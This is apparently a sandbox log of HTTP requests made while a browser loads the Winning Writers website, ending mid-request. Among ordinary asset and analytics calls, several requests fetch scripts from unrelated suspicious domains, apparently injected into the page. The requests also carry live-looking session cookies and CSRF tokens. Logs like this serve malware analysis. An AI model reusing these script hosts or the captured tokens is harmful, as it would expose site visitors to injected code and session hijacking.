          Source: global trafficHTTP traffic detected: GET /td/ga/rul?tid=G-S2XE0RVPX9&gacid=723902191.1731960008&gtm=45je4be0v889608727z8846709124za200zb846709124&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067554~102067808~102077855~102081484&z=1314571359 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
          Source: global trafficHTTP traffic detected: GET /assets/js/pageslide.js HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _ga=GA1.2.723902191.1731960008; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610
          Source: global trafficHTTP traffic detected: GET /assets/fancybox/jquery.fancybox.pack.js HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960008.60.0.0; _ga=GA1.1.723902191.1731960008
          Source: global trafficHTTP traffic detected: GET /assets/images/lion-mobile.png HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960008.60.0.0; _ga=GA1.1.723902191.1731960008
          Source: global trafficHTTP traffic detected: GET /i/adsct?bci=3&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=e1e54de9-06c4-4a40-9102-eec93f94572b&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=580bb215-95ae-413b-b0c8-e4ee476adf13&tw_document_href=https%3A%2F%2Fwinningwriters.com%2F&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o49bc&type=javascript&version=2.3.31 HTTP/1.1Host: t.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: muc_ads=198b7abe-d754-428d-93d1-280e07e96045; __cf_bm=YvbiLUCv27xU6sXb6u99f5YtcMZtwRaq5lqK8RLL_dQ-1731960009-1.0.1.1-xor7FCo35fsi53YGdQYzYIVvOrY2Iv4cfzo77P27PiGwzQFlpWyshQH__KGy2UqNZtp8B8E7wGUQ2lm861uFAw
          Source: global trafficHTTP traffic detected: GET /assets/js/device.min.js HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960008.60.0.0; _ga=GA1.1.723902191.1731960008
          Source: global trafficHTTP traffic detected: GET /graphics/staff/jendi_reiter_by_ezra_autumn_wilde_2023_square_200.png HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960008.60.0.0; _ga=GA1.1.723902191.1731960008
          Source: global trafficHTTP traffic detected: GET /i/adsct?bci=3&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=e1e54de9-06c4-4a40-9102-eec93f94572b&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=580bb215-95ae-413b-b0c8-e4ee476adf13&tw_document_href=https%3A%2F%2Fwinningwriters.com%2F&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o49bc&type=javascript&version=2.3.31 HTTP/1.1Host: analytics.twitter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: personalization_id="v1_mSmLoy3+5VWQAU9epQPbgw=="
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960006858&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSGwCa7L7d8_tahwouFkWEMPhMGqs141QoAhXnsQ&random=2808805193&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/js/jquery.cookie.js HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960008.60.0.0; _ga=GA1.1.723902191.1731960008
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /assets/js/jquery.matchHeight-min.js HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960008.60.0.0; _ga=GA1.1.723902191.1731960008
          Source: global trafficHTTP traffic detected: GET /j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-216038-1&cid=723902191.1731960008&jid=878809402&gjid=1037938329&_gid=1788557778.1731960008&_u=YGBAgEABAAAAAGAAI~&z=1716026079 HTTP/1.1Host: stats.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUmU9BrGmowYeEAFj63Amj7wo1xzgFQYDE60tcJ3OfQMbNLJMYVdUCk56ely
          Source: global trafficHTTP traffic detected: GET /google/jquery.php HTTP/1.1Host: cta.berlmember.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/js/feed.js HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960008.60.0.0; _ga=GA1.1.723902191.1731960008
          Source: global trafficHTTP traffic detected: GET /yJuiD HTTP/1.1Host: premiumserviceads.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /tr/?id=188856481728275&ev=PageView&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960008622&cd[eventID]=event.id.17319600027701&sw=1280&sh=1024&v=2.9.177&r=stable&ec=0&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&eid=event.id.17319600027701&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/js/responsiveslides.js HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960008.60.0.0; _ga=GA1.1.723902191.1731960008
          Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=188856481728275&ev=PageView&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960008622&cd[eventID]=event.id.17319600027701&sw=1280&sh=1024&v=2.9.177&r=stable&ec=0&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&eid=event.id.17319600027701&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/images/lion-mobile.png HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960008.60.0.0; _ga=GA1.1.723902191.1731960008
          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PWK4kk87hbNDodd&MD=PRszgUPh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /graphics/staff/jendi_reiter_by_ezra_autumn_wilde_2023_square_200.png HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960008.60.0.0; _ga=GA1.1.723902191.1731960008
          Source: global trafficHTTP traffic detected: GET /cflaer.js HTTP/1.1Host: bcbshieldn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cflaer.js HTTP/1.1Host: bcbshieldn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/images/slideshow-pager.png HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/assets/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga=GA1.1.723902191.1731960008; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960013.55.0.0
          Source: global trafficHTTP traffic detected: GET /assets/images/slidecontrols.png HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/assets/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga=GA1.1.723902191.1731960008; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960013.55.0.0
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960013577&cv=11&fst=1731960013577&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /td/rul/1072733940?random=1731960013577&cv=11&fst=1731960013577&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: 